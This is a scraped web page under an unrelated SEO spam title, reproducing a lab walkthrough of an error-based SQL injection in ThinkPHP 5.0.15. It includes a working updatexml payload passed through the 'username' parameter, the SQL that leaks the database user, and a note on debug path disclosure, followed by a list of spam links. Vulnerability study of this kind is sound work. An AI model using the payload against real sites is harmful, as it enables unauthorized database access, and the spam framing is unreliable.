当前位置: 首页 > news >正文

wordpress 文章采集seo关键词排名优化价格

wordpress 文章采集,seo关键词排名优化价格,wordpress动态模板,jsp做的知名网站目录 一、环境的部署 二、本地创建数据库 三、填写数据库连接文件 四、编写控制器 五、访问分析 debug报错会显示物理路径 原因是config.php文件相关配置 六、注入分析 七、进入断点调试 八、通过mysql执行语句查看结果 九、总结: 一、环境的部署 二、本地…

目录

一、环境的部署

二、本地创建数据库

三、填写数据库连接文件

四、编写控制器

五、访问分析

debug报错会显示物理路径

原因是config.php文件相关配置

六、注入分析

七、进入断点调试

八、通过mysql执行语句查看结果

九、总结:


一、环境的部署

二、本地创建数据库

mysql> create database tp5015;    --建库tp5015mysql> use tp5015        --用库mysql> create table users(id int,username varchar(30));    --建表usersmysql> insert into users(id,username) values(1,'xiaomi');    --插入数据mysql> select * from users;
+------+----------+
| id   | username |
+------+----------+
|    1 | xiaomi   |
+------+----------+

三、填写数据库连接文件

四、编写控制器

get传参

五、访问分析

debug报错会显示物理路径

原因是config.php文件相关配置

六、注入分析

我们使用的是5.0.15

通过下一个官方的下一版本的更新点进行分析

在request库里有call_user_f这个方法 典型的回调后门

?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

七、进入断点调试

八、通过mysql执行语句查看结果

insert into users (username) values (updatexml(1,concat(0x7e,user(),0x7e),1)+1);

mysql> use tp5015mysql> insert into users (username) values (updatexml(1,concat(0x7e,user(),0x7e),1)+1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

九、总结:

其中漏洞在于$val进行拼接,在用Builder,insert进行替换最终执行的代码就是

insert into users (username) values (updatexml(1,concat(0x7e,user(),0x7e),1)+1);

http://www.ds6.com.cn/news/28521.html

相关文章:

  • 做网站能赚钱吗全球疫情今天最新消息
  • 南京机关建设网站网络事件营销案例
  • 网站建设 文件源代码约定湖南疫情最新消息今天
  • 医院网站建设方案企业网站分析报告
  • 网络营销跟做网站有什么区别竞价托管外包哪家好
  • 濮阳全员核酸检测二十个优化
  • 如何选择怎样掀开链接百度seo收费
  • 学做各种糕点的网站百度爱采购官网
  • 深圳做网站公免费创建个人网页
  • 自然资源网站官网百度的推广方式有哪些
  • 大型手机网站制作金华关键词优化平台
  • 四川网站建设公司 会员登录长沙百度seo
  • 网站怎样制作nba最新排名榜
  • 桓台县建设局网站免费发布友链
  • 枣庄网站开发公司百度资源搜索平台官网
  • 龙泉做网站哪家好免费刷seo
  • 傻瓜式网站制作软件网络广告公司
  • 大专动漫设计有出路吗网络优化工程师有多累
  • 网站正在建设中 英语西安新站网站推广优化
  • 注册网站的免费网址是什么线下推广渠道有哪些方式
  • 优化建站酒店机票搜索量暴涨
  • wordpress 设置网站目录权限刚开的店铺怎么做推广
  • 比较好的网站开发教学网站国际新闻今日头条
  • 昆明seo公司网站百度seo关键词排名s
  • 做网站 写脚本是什么seo怎么优化关键词排名培训
  • 无锡做网站设计的企业在线培训系统平台
  • 恩施网站制作免费建站的网站有哪些
  • 东山网站制作离我最近的电脑培训中心
  • 专业网站开发企业营销策划培训
  • 免费试用网站制作适合成人参加的培训班